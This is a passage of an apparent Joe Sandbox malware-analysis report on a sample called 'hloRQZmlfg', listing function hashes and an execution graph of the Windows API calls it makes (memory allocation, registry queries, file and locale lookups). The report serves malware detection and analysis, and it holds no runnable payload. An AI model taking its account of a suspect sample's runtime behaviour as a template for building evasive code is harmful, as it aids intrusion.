                                                                                • Opcode Fuzzy Hash: 6d9dbc3f9627bd09a1cb235800d297c64549675dc203413e81f1a03a6d1e9c6b
                                                                                • Instruction Fuzzy Hash: 8FE06D323007008BC715BB7EE840AAB77EAEBC9A61314852AD606DB304EF74ED058BD1
                                                                                Function 02AD1FF8 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dbdf73646ee93a1023e49303ec72872e986bb9aaea61c38c45701e6066066e3e
                                                                                • Instruction ID: 0e754edab2e438c11d83dbdd459bf6c6dea88521feb0f64b6005d59e8caf05b7
                                                                                • Opcode Fuzzy Hash: dbdf73646ee93a1023e49303ec72872e986bb9aaea61c38c45701e6066066e3e
                                                                                • Instruction Fuzzy Hash: 22E04F22B441292B5A08E6AE689197FA6DFEAC86A0324413AE00EE7381DE611C0242A5
                                                                                Function 02AD2D70 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 85862168dfe044296a0c0e8b4162393ea06e55d8aee54bfecbd99183fec1613d
                                                                                • Instruction ID: fb3f668b6a583e9f72c3330dce1fef301fef7c1291fff1ac8348252ebde5fa91
                                                                                • Opcode Fuzzy Hash: 85862168dfe044296a0c0e8b4162393ea06e55d8aee54bfecbd99183fec1613d
                                                                                • Instruction Fuzzy Hash: 2BE04F363401104BCA08B769B814AAE37DFC7CAA61B44003AD61EC7654DE519C0687E0
                                                                                Function 02AD16B8 Relevance: .0, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8b09843495804134bead146d1048976f462e5c868a382162b1be8dc285377e26
                                                                                • Instruction ID: 58a81736aa1c1b6c9199335f5347f58c8eff8b4882db4d2c4a87053dcb326c63
                                                                                • Opcode Fuzzy Hash: 8b09843495804134bead146d1048976f462e5c868a382162b1be8dc285377e26
                                                                                • Instruction Fuzzy Hash: A7E020333442501BDB0567789C117A53F9E8F8F714F1844B5E545DF2E1DD5BD8158780
                                                                                Function 02AD16C8 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 94e231e18ea56b1baeb125d513758b517306e4cbe89d243a31778a6c5e954ecf
                                                                                • Instruction ID: 29776f30bb61a8e9edb1c97d7a601e8632a0c7ceb783755bc528e968cbe0f3a7
                                                                                • Opcode Fuzzy Hash: 94e231e18ea56b1baeb125d513758b517306e4cbe89d243a31778a6c5e954ecf
                                                                                • Instruction Fuzzy Hash: 25D02B723403206BD70436756C017A83ADD8B4A720F044066FA05DB2D1DD67DC0287C4
                                                                                Function 02AD4FD0 Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 116589a7fea066e46f3c5001491f4ab47006e85ef9fa75ac0cef979976bd5d2b
                                                                                • Instruction ID: 9fadc335261a188c4ceb90af20308713a8bde018f19a6821c80eaf4e8251813e
                                                                                • Opcode Fuzzy Hash: 116589a7fea066e46f3c5001491f4ab47006e85ef9fa75ac0cef979976bd5d2b
                                                                                • Instruction Fuzzy Hash: 23E04FB2D40209EFCB80FFB8D90165E77B5FB45202F1041A9D805D7201EB309F04C791
                                                                                Function 02AD0F51 Relevance: .0, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6573d510360011c5c2a211c7b572eedbd7f7b9a343c93bbd62d0985fd523fc5d
                                                                                • Instruction ID: 56725735ecea54c5f6289196c9c212366f4ca67b967fb1fb9ba48664871ece6e
                                                                                • Opcode Fuzzy Hash: 6573d510360011c5c2a211c7b572eedbd7f7b9a343c93bbd62d0985fd523fc5d
                                                                                • Instruction Fuzzy Hash: F2D0127150120CEBC710DFB09901459B7A8DB8A205B1005F5DC09D2110EA328A119691
                                                                                Function 02AD1170 Relevance: .0, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0e09dd93d258b44db492fab9ec7d61d4134106b43be9aac275779f7e9feb6d0
                                                                                • Instruction ID: fde3f96b4ae6021987ef1b20c5a352cabb4189e277590ba173224a4b3a9249c1
                                                                                • Opcode Fuzzy Hash: a0e09dd93d258b44db492fab9ec7d61d4134106b43be9aac275779f7e9feb6d0
                                                                                • Instruction Fuzzy Hash: C4D017B1905248AFDB11DFB4C845B5D7BB8AB05240F210499E459D7241EA319E50C795
                                                                                Function 02AD4FE0 Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 66545cb7aac81bdad4501f9cdbf9f206ce4435aeeb2031cb09dc2f3467770c2a
                                                                                • Instruction ID: 21e69d506fd0bb754c20a2115c5f13d377dff76ad2430a5037ca5c174af5256a
                                                                                • Opcode Fuzzy Hash: 66545cb7aac81bdad4501f9cdbf9f206ce4435aeeb2031cb09dc2f3467770c2a
                                                                                • Instruction Fuzzy Hash: 45D017B1A0020CEF8B40FFA8E90155EB7F9EB44206B1045A89809E7204EA316F08DB91
                                                                                Function 02AD51DB Relevance: .0, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8de59cb28018bbf0e061ee7fdca70ed00dd5879cd4f58cbdc3da5a96cc5b107a
                                                                                • Instruction ID: abed2cad12a8d590c4d864d256ebcab5a3e2884dcd0fcd913806249b2d119794
                                                                                • Opcode Fuzzy Hash: 8de59cb28018bbf0e061ee7fdca70ed00dd5879cd4f58cbdc3da5a96cc5b107a
                                                                                • Instruction Fuzzy Hash: 1AD0527240E3C08FC3028B308A24A513FB1BE0224230E40EBD080CF2E3DA2A8888D722
                                                                                Function 02AD4413 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69838bb5a28c2da43e1cb8224e8be2122dc2e265d1ea4b564bbec74a50f3e402
                                                                                • Instruction ID: 3f41f27d70a73397a4c0fd9c12d9876d566d64241fa45d4645a7514a55e6089f
                                                                                • Opcode Fuzzy Hash: 69838bb5a28c2da43e1cb8224e8be2122dc2e265d1ea4b564bbec74a50f3e402
                                                                                • Instruction Fuzzy Hash: 0EC0123110A3808FC3060A3188109267B79AE0224238A41EAA042CE2A3CA2AC9A8C7A1
                                                                                Function 02AD0EFC Relevance: .0, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 47b40ceb9eba1e20e6a02a373d3fc138eb174493c1009ec8a0d6f504ffe5ad92
                                                                                • Instruction ID: 1bf4d38333e9f2b5e1f7803685775dc1c80482e82706c12ab4a2c0fe591b99d7
                                                                                • Opcode Fuzzy Hash: 47b40ceb9eba1e20e6a02a373d3fc138eb174493c1009ec8a0d6f504ffe5ad92
                                                                                • Instruction Fuzzy Hash: 70B01237B0001986CB04E6C9F8404ECFB30DBD4332F004033C30072040873125BAC764
                                                                                Function 02AD0850 Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 070ee6cccc3e15d46ee66ec50590e7777e9a8eff666fa558cb65bb3d3a3e7469
                                                                                • Instruction ID: 65cb2b11d56062c421e654ed4e990e3ec1c6050b64ab5e400853f98979c7670f
                                                                                • Opcode Fuzzy Hash: 070ee6cccc3e15d46ee66ec50590e7777e9a8eff666fa558cb65bb3d3a3e7469
                                                                                • Instruction Fuzzy Hash: 11900271044A0C8F494027967D095557BAC9ADA5157900071B50D555515AA574144595

                                                                                Non-executed Functions

                                                                                Function 02AD9498 Relevance: .3, Instructions: 281COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 895c3d27235bb3bef1d308c36e0a473f23a4840c32e472c0bec88024c23c72fb
                                                                                • Instruction ID: b3098fec2ea676ccde15ebb24404cf5e71f4015b1dd91d27c55bc18dc89fce6c
                                                                                • Opcode Fuzzy Hash: 895c3d27235bb3bef1d308c36e0a473f23a4840c32e472c0bec88024c23c72fb
                                                                                • Instruction Fuzzy Hash: BBB13B74E0024ADFDB14CFA9C8857EEBBF2AF88714F148529D816A7294EB74D845CF81
                                                                                Function 02ADA168 Relevance: .3, Instructions: 266COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1414298cd2da8aec7ca07896948e0a9534258b5558d33909b0b74df00e37b522
                                                                                • Instruction ID: a9df76e46c2aed1148a617b40d84ebe4fbcc4900f1bac900805bc0a83573e7df
                                                                                • Opcode Fuzzy Hash: 1414298cd2da8aec7ca07896948e0a9534258b5558d33909b0b74df00e37b522
                                                                                • Instruction Fuzzy Hash: 3DB16EB0E00209CFDB14CFA9D8857EDBBF2BF88714F248529D816E7295EB759845CB81
                                                                                Function 02AD9150 Relevance: .2, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61bd8a38df90b620d356ec38c83d9435e556cd4ae0169b680c5f704928e5277d
                                                                                • Instruction ID: e73e6447e1825f1484546cc88878a647a88faf0cc632ec4f4d8a1ec59fc65daf
                                                                                • Opcode Fuzzy Hash: 61bd8a38df90b620d356ec38c83d9435e556cd4ae0169b680c5f704928e5277d
                                                                                • Instruction Fuzzy Hash: FD913EB0E0020ADFDF14DFA9C9857DEBBF2AF88714F148529E416A7294EB74D845CB81

                                                                                Execution Graph

                                                                                Execution Coverage:7.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:8.6%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:42
                                                                                execution_graph 21364 406220 21365 406237 21364->21365 21366 406248 21364->21366 21381 406190 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 21365->21381 21367 406251 GetCurrentThreadId 21366->21367 21369 40625e 21366->21369 21367->21369 21377 405ec4 21369->21377 21371 406241 21371->21366 21372 4062a5 21373 4062d1 FreeLibrary 21372->21373 21375 4062d7 21372->21375 21373->21375 21374 406313 21375->21374 21376 406308 ExitProcess 21375->21376 21378 405f08 21377->21378 21379 405ed3 21377->21379 21378->21372 21379->21378 21382 414634 21379->21382 21381->21371 21383 41465c 21382->21383 21384 41463c 21382->21384 21383->21379 21385 41463f InterlockedCompareExchange 21384->21385 21385->21385 21386 41464d CloseHandle 21385->21386 21386->21383 21386->21385 21387 403220 21388 403230 21387->21388 21389 4032b8 21387->21389 21392 403274 21388->21392 21393 40323d 21388->21393 21390 4032c1 21389->21390 21391 402b58 21389->21391 21394 4032d9 21390->21394 21406 4033e8 21390->21406 21397 403533 21391->21397 21398 402b7a VirtualQuery 21391->21398 21399 402c5b 21391->21399 21395 402ca4 10 API calls 21392->21395 21396 403248 21393->21396 21400 402ca4 10 API calls 21393->21400 21402 4032fc 21394->21402 21407 4033c0 21394->21407 21430 4032e0 21394->21430 21418 40328b 21395->21418 21411 402c23 21398->21411 21412 402bb3 21398->21412 21405 402c59 21399->21405 21409 402ca4 10 API calls 21399->21409 21416 403255 21400->21416 21401 40344c 21403 402ca4 10 API calls 21401->21403 21423 403465 21401->21423 21415 40333c Sleep 21402->21415 21402->21430 21426 4034fc 21403->21426 21404 4032b1 21406->21401 21414 403424 Sleep 21406->21414 21406->21423 21413 402ca4 10 API calls 21407->21413 21428 402c72 21409->21428 21410 40326d 21439 402ca4 21411->21439 21412->21411 21421 402be0 VirtualAlloc 21412->21421 21422 402bde 21412->21422 21432 4033c9 21413->21432 21414->21401 21419 40343e Sleep 21414->21419 21420 403354 Sleep 21415->21420 21415->21430 21416->21410 21424 403028 10 API calls 21416->21424 21418->21404 21427 403028 10 API calls 21418->21427 21419->21406 21420->21402 21421->21411 21429 402bf6 VirtualAlloc 21421->21429 21422->21421 21424->21410 21425 4033e1 21426->21423 21433 403028 10 API calls 21426->21433 21427->21404 21428->21405 21434 403028 10 API calls 21428->21434 21429->21411 21431 402c0c 21429->21431 21431->21405 21432->21425 21436 403028 10 API calls 21432->21436 21437 403520 21433->21437 21434->21405 21435 402c2a 21435->21405 21463 403028 21435->21463 21436->21425 21440 402f04 21439->21440 21441 402cbc 21439->21441 21442 40301c 21440->21442 21443 402ec8 21440->21443 21449 402cce 21441->21449 21455 402d59 Sleep 21441->21455 21444 402a50 VirtualAlloc 21442->21444 21445 403025 21442->21445 21450 402ee2 Sleep 21443->21450 21452 402f22 21443->21452 21447 402a8b 21444->21447 21448 402a7b 21444->21448 21445->21435 21446 402cdd 21446->21435 21447->21435 21483 402a08 21448->21483 21449->21446 21456 402d9d Sleep 21449->21456 21458 402dbc 21449->21458 21450->21452 21454 402ef8 Sleep 21450->21454 21453 402f40 21452->21453 21457 402990 VirtualAlloc 21452->21457 21453->21435 21454->21443 21455->21449 21459 402d6f Sleep 21455->21459 21456->21458 21461 402db3 Sleep 21456->21461 21457->21453 21462 402dc8 21458->21462 21489 402990 21458->21489 21459->21441 21461->21449 21462->21435 21464 403120 21463->21464 21465 40303d 21463->21465 21466 402ab4 21464->21466 21467 403043 21464->21467 21465->21467 21470 4030ba Sleep 21465->21470 21468 40321a 21466->21468 21471 402a08 2 API calls 21466->21471 21469 40304c 21467->21469 21474 4030fe Sleep 21467->21474 21477 403135 21467->21477 21468->21405 21469->21405 21470->21467 21473 4030d4 Sleep 21470->21473 21472 402ac5 21471->21472 21475 402af5 21472->21475 21476 402adb VirtualFree 21472->21476 21473->21465 21474->21477 21478 403114 Sleep 21474->21478 21479 402aec 21475->21479 21480 402afe VirtualQuery VirtualFree 21475->21480 21476->21479 21481 4031b4 VirtualFree 21477->21481 21482 403158 21477->21482 21478->21467 21479->21405 21480->21475 21480->21479 21481->21405 21482->21405 21484 402a4e 21483->21484 21485 402a11 21483->21485 21484->21447 21485->21484 21486 402a1c Sleep 21485->21486 21487 402a31 21486->21487 21487->21484 21488 402a35 Sleep 21487->21488 21488->21485 21493 402924 21489->21493 21491 402998 VirtualAlloc 21492 4029af 21491->21492 21492->21462 21494 4028c4 21493->21494 21494->21491 21495 40f6c0 WriteFile 21496 40f6dd 21495->21496 21497 4046c0 21498 4046d0 WriteFile 21497->21498 21500 4046cc 21497->21500 21499 4046e8 GetLastError 21498->21499 21498->21500 21499->21500 21501 4083b0 21502 4083c0 GetModuleFileNameW 21501->21502 21504 4083dc 21501->21504 21505 40920c GetModuleFileNameW 21502->21505 21506 40925a 21505->21506 21511 40941c 21506->21511 21508 409286 21509 409298 LoadLibraryExW 21508->21509 21510 4092a0 21508->21510 21509->21510 21510->21504 21512 409455 21511->21512 21533 406bf0 21512->21533 21514 40947d 21515 40948f lstrcpynW lstrlenW 21514->21515 21516 4094b9 21515->21516 21518 40952a 21516->21518 21554 408f6c 21516->21554 21518->21508 21519 409515 21520 40951e 21519->21520 21521 40952f GetUserDefaultUILanguage 21519->21521 21522 409310 3 API calls 21520->21522 21578 408c28 EnterCriticalSection 21521->21578 21522->21518 21524 409540 21601 409310 21524->21601 21526 40954b 21527 409577 21526->21527 21528 40955b GetSystemDefaultUILanguage 21526->21528 21527->21518 21606 4093c0 GetUserDefaultUILanguage GetLocaleInfoW 21527->21606 21529 408c28 33 API calls 21528->21529 21531 40956c 21529->21531 21532 409310 3 API calls 21531->21532 21532->21527 21534 406bf4 21533->21534 21537 406c10 21533->21537 21534->21533 21536 406c00 21534->21536 21540 40716f 21534->21540 21541 4070b0 21534->21541 21535 406c40 21535->21514 21536->21537 21611 407504 21536->21611 21537->21535 21616 4041cc 14 API calls 21537->21616 21541->21540 21542 406bf0 15 API calls 21541->21542 21544 4070c3 21541->21544 21542->21544 21543 40710c 21543->21540 21547 407504 14 API calls 21543->21547 21546 4070ee 21544->21546 21617 406504 15 API calls 21544->21617 21546->21543 21618 406504 15 API calls 21546->21618 21550 407122 21547->21550 21549 40715a 21552 406bf0 15 API calls 21549->21552 21550->21549 21619 406368 14 API calls 21550->21619 21553 40716b 21552->21553 21553->21514 21555 408f83 21554->21555 21556 408f97 GetModuleFileNameW 21555->21556 21557 408fac 21555->21557 21558 408fc6 21556->21558 21559 408fb9 lstrcpynW 21557->21559 21560 408fd4 RegOpenKeyExW 21558->21560 21567 40913b 21558->21567 21559->21558 21561 409055 21560->21561 21562 408ff7 RegOpenKeyExW 21560->21562 21629 408d70 12 API calls 21561->21629 21562->21561 21563 409015 RegOpenKeyExW 21562->21563 21563->21561 21565 409033 RegOpenKeyExW 21563->21565 21565->21561 21565->21567 21566 409073 RegQueryValueExW 21568 409091 21566->21568 21569 4090c4 RegQueryValueExW 21566->21569 21567->21519 21572 4041b0 14 API calls 21568->21572 21570 4090e0 21569->21570 21571 4090c2 21569->21571 21573 4041b0 14 API calls 21570->21573 21575 40912a RegCloseKey 21571->21575 21630 4041cc 14 API calls 21571->21630 21574 409099 RegQueryValueExW 21572->21574 21576 4090e8 RegQueryValueExW 21573->21576 21574->21571 21575->21519 21576->21571 21579 408c74 LeaveCriticalSection 21578->21579 21580 408c54 21578->21580 21581 406bf0 15 API calls 21579->21581 21582 408c65 LeaveCriticalSection 21580->21582 21583 408c87 IsValidLocale 21581->21583 21592 408d17 21582->21592 21584 408ce5 EnterCriticalSection 21583->21584 21585 408c96 21583->21585 21671 406c7c 21584->21671 21587 408caa 21585->21587 21588 408c9f 21585->21588 21632 408908 18 API calls 21587->21632 21631 408b08 20 API calls 21588->21631 21592->21524 21593 408cb3 GetSystemDefaultUILanguage 21593->21584 21595 408cbd 21593->21595 21594 408ca8 21594->21584 21596 408cce GetSystemDefaultUILanguage 21595->21596 21633 406fe0 21595->21633 21670 408908 18 API calls 21596->21670 21599 408cdb 21600 406fe0 15 API calls 21599->21600 21600->21584 21602 409324 21601->21602 21603 409393 21602->21603 21604 409365 lstrcpynW 21602->21604 21603->21526 21700 4092d8 FindFirstFileW 21604->21700 21607 4092d8 2 API calls 21606->21607 21608 4093f3 21607->21608 21609 4092d8 2 API calls 21608->21609 21610 409410 21608->21610 21609->21610 21610->21518 21612 40753d 21611->21612 21613 407508 21611->21613 21612->21537 21613->21612 21620 4041b0 21613->21620 21615 407517 21615->21537 21616->21535 21617->21546 21618->21543 21619->21549 21622 4041b4 21620->21622 21621 4042c5 21628 404294 10 API calls 21621->21628 21622->21615 21622->21621 21623 4041be 21622->21623 21627 40a264 14 API calls 21622->21627 21623->21615 21626 4042e6 21626->21615 21627->21621 21628->21626 21629->21566 21630->21575 21631->21594 21632->21593 21634 406fe8 21633->21634 21644 407099 21633->21644 21635 406ff2 21634->21635 21647 406bf0 21634->21647 21637 407069 21635->21637 21638 406ffd 21635->21638 21636 406c10 21639 406c40 21636->21639 21673 4041cc 14 API calls 21636->21673 21645 407079 21637->21645 21693 406504 15 API calls 21637->21693 21649 407009 21638->21649 21674 406504 15 API calls 21638->21674 21639->21596 21640 406c00 21640->21636 21648 407504 14 API calls 21640->21648 21642 407029 21642->21644 21676 406f48 21642->21676 21644->21596 21645->21644 21646 406f48 15 API calls 21645->21646 21655 407045 21646->21655 21647->21636 21647->21640 21652 40716f 21647->21652 21653 4070b0 21647->21653 21648->21636 21649->21642 21675 406504 15 API calls 21649->21675 21653->21652 21657 406bf0 15 API calls 21653->21657 21660 4070c3 21653->21660 21656 407064 21655->21656 21689 406344 21655->21689 21656->21596 21657->21660 21658 40710c 21658->21652 21663 407504 14 API calls 21658->21663 21662 4070ee 21660->21662 21694 406504 15 API calls 21660->21694 21662->21658 21695 406504 15 API calls 21662->21695 21665 407122 21663->21665 21666 40715a 21665->21666 21696 406368 14 API calls 21665->21696 21668 406bf0 15 API calls 21666->21668 21669 40716b 21668->21669 21669->21596 21670->21599 21672 406c80 lstrcpynW LeaveCriticalSection 21671->21672 21672->21592 21673->21639 21674->21649 21675->21642 21677 406fb8 21676->21677 21678 406f55 21676->21678 21679 406344 14 API calls 21677->21679 21682 406f6d 21678->21682 21683 406fac 21678->21683 21697 406d1c 15 API calls 21678->21697 21688 406fa9 21679->21688 21680 407504 14 API calls 21680->21677 21682->21683 21684 406f86 21682->21684 21683->21680 21698 4041e4 14 API calls 21684->21698 21686 406f8e 21687 406344 14 API calls 21686->21687 21686->21688 21687->21688 21688->21655 21690 40634a 21689->21690 21692 406365 21689->21692 21690->21692 21699 4041cc 14 API calls 21690->21699 21692->21656 21693->21645 21694->21662 21695->21658 21696->21666 21697->21682 21698->21686 21699->21692 21701 409301 FindClose 21700->21701 21702 409307 21700->21702 21701->21702 21702->21602 21703 409d02 GetSystemInfo 21704 4069d4 21705 4068c4 21704->21705 21706 4069dc SysAllocStringLen 21704->21706 21709 4068d8 21705->21709 21710 4068ca SysFreeString 21705->21710 21707 406894 21706->21707 21708 4069ec SysFreeString 21706->21708 21711 4068b0 21707->21711 21712 4068a0 SysAllocStringLen 21707->21712 21710->21709 21712->21707 21712->21711 21713 40a178 21714 40a191 21713->21714 21715 40a1d2 21713->21715 21731 40493c 14 API calls 21714->21731 21717 40a19b 21732 40493c 14 API calls 21717->21732 21719 40a1a5 21733 40493c 14 API calls 21719->21733 21721 40a1af 21734 40874c DeleteCriticalSection 21721->21734 21723 40a1b4 21735 404144 21723->21735 21727 40a1be 21728 406344 14 API calls 21727->21728 21729 40a1c8 21728->21729 21730 406344 14 API calls 21729->21730 21730->21715 21731->21717 21732->21719 21733->21721 21734->21723 21736 40414d CloseHandle 21735->21736 21737 40415f 21735->21737 21736->21737 21738 40416d 21737->21738 21751 403b64 VirtualQuery Sleep Sleep VirtualAlloc MessageBoxA 21737->21751 21740 404176 VirtualFree 21738->21740 21741 40418f 21738->21741 21740->21741 21745 4040b4 21741->21745 21744 40a15f 6 API calls 21744->21727 21746 4040d9 21745->21746 21747 4040c7 VirtualFree 21746->21747 21748 4040dd 21746->21748 21747->21746 21749 404124 VirtualFree 21748->21749 21750 40413a 21748->21750 21749->21748 21750->21744 21751->21738 21752 44373c 21753 443744 21752->21753 21753->21753 22183 40a2b0 GetModuleHandleW 21753->22183 21761 44378b 21762 407450 15 API calls 21761->21762 21763 443797 21762->21763 21764 404cdc 14 API calls 21763->21764 21765 44379c 21764->21765 21766 4042f8 14 API calls 21765->21766 21767 4437a1 21766->21767 21768 407450 15 API calls 21767->21768 21769 4437ad 21768->21769 21770 404cdc 14 API calls 21769->21770 21771 4437b2 21770->21771 21772 4042f8 14 API calls 21771->21772 21773 4437b7 21772->21773 21774 407450 15 API calls 21773->21774 21775 4437c0 21774->21775 21776 404cdc 14 API calls 21775->21776 21777 4437c5 21776->21777 21778 4042f8 14 API calls 21777->21778 21779 4437ca 21778->21779 22209 404504 GetCommandLineW 21779->22209 21781 4437cf 21782 443876 21781->21782 22214 404564 21781->22214 21784 407450 15 API calls 21782->21784 21786 443882 21784->21786 21788 404cdc 14 API calls 21786->21788 21789 443887 21788->21789 21791 4042f8 14 API calls 21789->21791 21790 4437f0 21792 44396a 21790->21792 21795 404564 17 API calls 21790->21795 21794 44388c 21791->21794 21793 404564 17 API calls 21792->21793 21796 443977 21793->21796 21797 407450 15 API calls 21794->21797 21798 443803 21795->21798 21799 4072a4 15 API calls 21796->21799 21800 443898 21797->21800 21801 4072a4 15 API calls 21798->21801 21802 443984 21799->21802 21803 404cdc 14 API calls 21800->21803 21804 443810 21801->21804 21805 443986 21802->21805 21806 4439ac 21802->21806 21807 44389d 21803->21807 21804->21792 21810 404564 17 API calls 21804->21810 22938 43cea4 21805->22938 21814 4439bc 21806->21814 21815 4439ed 21806->21815 21809 4042f8 14 API calls 21807->21809 21812 4438a2 21809->21812 21813 443823 21810->21813 21811 443993 21817 407450 15 API calls 21811->21817 21818 407450 15 API calls 21812->21818 21816 4072a4 15 API calls 21813->21816 21819 407450 15 API calls 21814->21819 22233 43a644 GetNativeSystemInfo 21815->22233 21820 443830 21816->21820 21821 44399d 21817->21821 21822 4438ab 21818->21822 21824 4439c8 21819->21824 21820->21792 21831 404564 17 API calls 21820->21831 21825 404cdc 14 API calls 21821->21825 21826 404cdc 14 API calls 21822->21826 21830 404cdc 14 API calls 21824->21830 21832 4439a2 21825->21832 21833 4438b0 21826->21833 21828 4439f6 21834 407450 15 API calls 21828->21834 21829 443a11 22235 43a7bc 21829->22235 21835 4439cd 21830->21835 21836 443843 21831->21836 21838 4042f8 14 API calls 21832->21838 21839 4042f8 14 API calls 21833->21839 21840 443a02 21834->21840 21841 4042f8 14 API calls 21835->21841 21842 4072a4 15 